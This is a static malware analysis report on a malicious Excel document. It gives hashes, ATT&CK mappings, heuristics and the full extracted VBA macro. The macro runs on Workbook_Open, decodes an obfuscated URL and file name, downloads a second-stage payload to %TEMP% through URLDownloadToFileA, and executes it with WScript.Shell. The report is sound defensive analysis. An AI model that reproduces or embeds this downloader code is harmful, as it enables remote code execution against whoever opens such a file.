Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2293fd013409e473…

MALICIOUS

Office (OLE)

34.5 KB Created: 2016-01-04 09:07:37 Authoring application: Microsoft Excel First seen: 2016-03-19
MD5: 8f2edd9cb98ad1f87cd3f219cc02bc30 SHA-1: 22959accce48a506702c0cc04ef2206a35330e03 SHA-256: 2293fd013409e4739de1bf077034fa3f426ca00ebe405c9b8a7aa7ad209f1a1a
330 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is an Excel document containing VBA macros. The document body prompts the user to 'Enable This Content' and 'Enable Editing and Contents', a common social engineering tactic to bypass macro security. The VBA code utilizes `URLDownloadToFileA` and `WScript.Shell` to download and execute a second-stage payload, as indicated by the critical heuristics for these functions. The specific URL for the download is not fully extracted due to truncation, but the intent is clear.

Heuristics 9

  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Private Sub XVPZVQXDUTNHUFMSJSLNBUTQYXJTGJHNOVHIMRODLUFOLGVBBZDURUKQQYZCXKRNGWXIWYGLVCVPDNNBRBTVIVBYHGRCOKJOWEPJNZWLMDNPTOEJJIKWZDSY()
Set XDMMWXDOFTCRUEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKR = CreateObject("WSCRIPT.SHELL")
IQKMYSROXVHSFIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEV = XDMMWXDOFTCRUEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKR.ExpandEnvironmentStrings("%TEMP%") + TBUNBMLZQYRTHUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWF
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    #If Win64 Then
Private Declare PtrSafe Function FGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEVWHUXEJTBUNBMLZQYRT Lib "urlmon" Alias "URLDownloadToFileA" (ByVal HUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWFHIEQXUMEFPDF As Long, ByVal MKCJVVJNTIRHTCPCIFOGRJORPVELOPUGESTJMWZULIJIKDGKSG As String, ByVal FNIJFRGVULGQLHNSKKEERVCQZPCKQKJGPOZRWZXDMMWXDOFTCR As String, ByVal UEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKRIQKMYSROXVHS As Long, ByVal FIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEVWHUXEJTBUNBM As Long) As Long
#Else
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Private Sub XVPZVQXDUTNHUFMSJSLNBUTQYXJTGJHNOVHIMRODLUFOLGVBBZDURUKQQYZCXKRNGWXIWYGLVCVPDNNBRBTVIVBYHGRCOKJOWEPJNZWLMDNPTOEJJIKWZDSY()
Set XDMMWXDOFTCRUEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKR = CreateObject("WSCRIPT.SHELL")
IQKMYSROXVHSFIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEV = XDMMWXDOFTCRUEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKR.ExpandEnvironmentStrings("%TEMP%") + TBUNBMLZQYRTHUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWF
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Sub
Private Sub Workbook_Open()
DHHHJUXCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPV = 1
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4674 bytes
SHA-256: d6c1fb1ece204081839dc4dd8f1ed1d59982b3c71c36f822d0648f8e1ace2db5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub GUvbsfln()

End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
#If Win64 Then
Private Declare PtrSafe Function FGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEVWHUXEJTBUNBMLZQYRT Lib "urlmon" Alias "URLDownloadToFileA" (ByVal HUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWFHIEQXUMEFPDF As Long, ByVal MKCJVVJNTIRHTCPCIFOGRJORPVELOPUGESTJMWZULIJIKDGKSG As String, ByVal FNIJFRGVULGQLHNSKKEERVCQZPCKQKJGPOZRWZXDMMWXDOFTCR As String, ByVal UEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKRIQKMYSROXVHS As Long, ByVal FIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEVWHUXEJTBUNBM As Long) As Long
#Else
Private Declare Function FGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEVWHUXEJTBUNBMLZQYRT Lib "urlmon" Alias "URLDownloadToFileA" (ByVal HUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWFHIEQXUMEFPDF As Long, ByVal MKCJVVJNTIRHTCPCIFOGRJORPVELOPUGESTJMWZULIJIKDGKSG As String, ByVal FNIJFRGVULGQLHNSKKEERVCQZPCKQKJGPOZRWZXDMMWXDOFTCR As String, ByVal UEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKRIQKMYSROXVHS As Long, ByVal FIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEVWHUXEJTBUNBM As Long) As Long
#End If
Dim KDGKSGFNIJFRGVULGQLHNSKKEERVCQZPCKQKJGPOZRWZXDMMWX, DHHHJUXCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPV, TBUNBMLZQYRTHUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWF, ELOPUGESTJMWZULIJIKDGKSGFNIJFRGVULGQLHNSKKEERVCQZP
Private Sub XVPZVQXDUTNHUFMSJSLNBUTQYXJTGJHNOVHIMRODLUFOLGVBBZDURUKQQYZCXKRNGWXIWYGLVCVPDNNBRBTVIVBYHGRCOKJOWEPJNZWLMDNPTOEJJIKWZDSY()
Set XDMMWXDOFTCRUEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKR = CreateObject("WSCRIPT.SHELL")
IQKMYSROXVHSFIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEV = XDMMWXDOFTCRUEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKR.ExpandEnvironmentStrings("%TEMP%") + TBUNBMLZQYRTHUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWF
FGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEVWHUXEJTBUNBMLZQYRT 0&, KDGKSGFNIJFRGVULGQLHNSKKEERVCQZPCKQKJGPOZRWZXDMMWX, IQKMYSROXVHSFIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEV, 0&, 0&
XDMMWXDOFTCRUEIDTQQQSLILBNGOQRNZOEVTOYTPVBSSMFSEKR.Run IQKMYSROXVHSFIGLNUFGLPNCJSDMKFUYYYBTPTIPOWYZVIQMEV
End Sub
Private Sub Workbook_Open()
DHHHJUXCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPV = 1

ELOPUGESTJMWZULIJIKDGKSGFNIJFRGVULGQLHNSKKEERVCQZP = 13
KDGKSGFNIJFRGVULGQLHNSKKEERVCQZPCKQKJGPOZRWZXDMMWX = XPVXWCKRVWBNKYZQTDHCRPPORKNQYMMUPQMYNDCSNWSNUZRRKK("u��}G<<„vyy€zn{�r{;| t;v{<zv{r : r€€€€;r…r")

TBUNBMLZQYRTHUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJUXCQXWF = XPVXWCKRVWBNKYZQTDHCRPPORKNQYMMUPQMYNDCSNWSNUZRRKK("iOVXYUbPe^UV`UW^\TZf;r…r")
XVPZVQXDUTNHUFMSJSLNBUTQYXJTGJHNOVHIMRODLUFOLGVBBZDURUKQQYZCXKRNGWXIWYGLVCVPDNNBRBTVIVBYHGRCOKJOWEPJNZWLMDNPTOEJJIKWZDSY
End Sub
Private Function XPVXWCKRVWBNKYZQTDHCRPPORKNQYMMUPQMYNDCSNWSNUZRRKK(YDJWHWIRXRQNWUGXDGEKSTEFJVLBIYCLPKZXXWZSOSHUNVXYUH)
For WHUXEJTBUNBMLZQYRTHUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJU = DHHHJUXCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPV To Len(YDJWHWIRXRQNWUGXDGEKSTEFJVLBIYCLPKZXXWZSOSHUNVXYUH)
XCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPVELOPUG = Mid(YDJWHWIRXRQNWUGXDGEKSTEFJVLBIYCLPKZXXWZSOSHUNVXYUH, WHUXEJTBUNBMLZQYRTHUZWGEPBNJHNVDNHMXVKLBLOSMDHHHJU, DHHHJUXCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPV)
XCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPVELOPUG = Chr(Asc(XCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPVELOPUG) - ELOPUGESTJMWZULIJIKDGKSGFNIJFRGVULGQLHNSKKEERVCQZP)
ESTJMWZULIJIKDGKSGFNIJFRGVULGQLHNSKKEERVCQZPCKQKJG = ESTJMWZULIJIKDGKSGFNIJFRGVULGQLHNSKKEERVCQZPCKQKJG + XCQXWFHIEQXUMEFPDFMKCJVVJNTIRHTCPCIFOGRJORPVELOPUG
Next
XPVXWCKRVWBNKYZQTDHCRPPORKNQYMMUPQMYNDCSNWSNUZRRKK = ESTJMWZULIJIKDGKSGFNIJFRGVULGQLHNSKKEERVCQZPCKQKJG
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.